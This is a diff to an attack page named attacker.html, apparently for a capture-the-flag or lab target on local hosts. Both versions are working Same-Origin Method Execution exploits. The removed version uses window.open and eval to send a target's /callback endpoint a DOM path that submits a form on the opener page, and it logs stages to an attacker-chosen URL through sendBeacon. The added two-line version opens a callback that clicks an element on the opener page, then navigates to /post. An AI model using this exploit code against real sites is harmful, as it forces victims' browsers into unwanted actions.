--- a/attacker.html
+++ b/attacker.html
@@ -1,64 +1,4 @@
-<!doctype html>
-<html lang="en">
-<head>
-  <meta charset="utf-8">
-  <title>SOME exploit</title>
-</head>
-<body>
 <script>
-const params = new URLSearchParams(window.location.search);
-const target = params.get('target') || 'http://127.0.0.1:8001';
-const callbackPath = params.get('callbackPath') ||
-  'opener.document.body.firstElementChild.nextElementSibling.firstElementChild.nextElementSibling.nextElementSibling.submit';
-const navDelay = Number(params.get('navDelay') || 300);
-const callbackDelay = Number(params.get('callbackDelay') || 6000);
-const logger = params.get('logger');
-
-function log(stage, extra = '') {
-  if (!logger) return;
-  try {
-    navigator.sendBeacon(`${logger}?stage=${encodeURIComponent(stage)}&extra=${encodeURIComponent(extra)}`);
-  } catch (_) {
-    // ignore logging errors
-  }
-}
-
-function openHelper() {
-  try {
-    const helper = window.open('', '_blank');
-    if (!helper) {
-      log('helper_null');
-      return false;
-    }
-    const payload = `
-      (function() {
-        const target = ${JSON.stringify(target)};
-        const cb = ${JSON.stringify(callbackPath)};
-        const delay = ${callbackDelay};
-        setTimeout(() => {
-          location = target + '/callback?callback=' + encodeURIComponent(cb);
-        }, delay);
-      })();
-    `;
-    helper.eval(payload);
-    log('helper_opened');
-    return true;
-  } catch (err) {
-    log('helper_error', String(err));
-    return false;
-  }
-}
-
-const helperOpened = openHelper();
-
-setTimeout(() => {
-  if (!helperOpened) {
-    log('nav_skipped');
-    return;
-  }
-  log('nav_start');
-  window.location = target + '/post';
-}, navDelay);
+    window.open("http://home:8001/callback?callback=opener.document.body.firstElementChild.nextElementSibling.firstElementChild.nextElementSibling.nextElementSibling.firstElementChild.nextElementSibling.firstElementChild.click");
+    location="http://home:8001/post";
 </script>
-</body>
-</html>
